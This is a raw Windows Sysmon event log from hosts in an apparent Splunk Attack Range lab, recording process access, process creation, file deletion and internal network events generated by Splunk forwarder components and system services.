10:37:45.140{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0E79-6216-FC03-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.140{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E79-6216-FC03-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.141{4F8D34B0-0E79-6216-FC03-000000003902}2908C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:46.638{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7B72E87CF95C5E2537C795DC7EEA94D,SHA256=7B3AD27FB7343BC0ECDE71BBB5D278BAD390E632E9C53A424886F21A2D66EC9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214371Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:46.562{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6945A0F320390874C5E81FDCE7BF4A8,SHA256=A1593D4BAF355C0A75B765E4DB27DD1E17327514197D99C6FBFFBC4A0A99471E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:43.552{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53240-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000214370Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:46.140{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=061AA23BAB3DFC63FC224EABEFAB8DED,SHA256=181293E30249B878130250001CBDA8FD4F6B0AFB210E0FA18317A751FDDD1F29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214369Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:46.140{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B64C21FCAC75C6EA092C972DDC75937,SHA256=EEE2BCE2A2C834988F63E2C98B0C80F29A7A5AB61EEC6E792F2467EEABC0FB23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214368Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:46.031{4F8D34B0-0E79-6216-FD03-000000003902}38003384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.562{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77EF8163D5DFC0CEA2BC5B70D45D043,SHA256=87571A5B9E504F04BDB1BF77EC5D7192998DBEDDF02D4997F87B1CC2320A3C62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:47.825{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C123EDF2A5289E458AEE28F05971D7FF,SHA256=9CE76493B198E9CF88936BD20FDB6BE38E75A3314D20D4F493169D0DBD5ABA99,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:45.111{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51186-false10.0.1.12-8089- 10341000x8000000000000000214384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E7B-6216-FE03-000000003902}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0E7B-6216-FE03-000000003902}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.437{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0E7B-6216-FE03-000000003902}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214372Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:47.438{4F8D34B0-0E7B-6216-FE03-000000003902}2716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214402Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.593{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4ED098B6E1AFB7EF511A150877E165E,SHA256=6675FC1FAC41F970278382309A2DF04C6936FEC09F85C71E2DB2C4F28C53EEF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:37:48.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0C91D084BF1AE6C47458FC216D7257B,SHA256=CBAA7C98193EAA3B1B35506322A3F0C5F68667E31DB4A10CFC1F8BB5E13ECBC7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214401Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.515{4F8D34B0-0E7C-6216-FF03-000000003902}32282336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000214400Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.468{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=061AA23BAB3DFC63FC224EABEFAB8DED,SHA256=181293E30249B878130250001CBDA8FD4F6B0AFB210E0FA18317A751FDDD1F29,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214399Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0E7C-6216-FF03-000000003902}3228C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214398Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214397Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:37:48.109{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214396Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 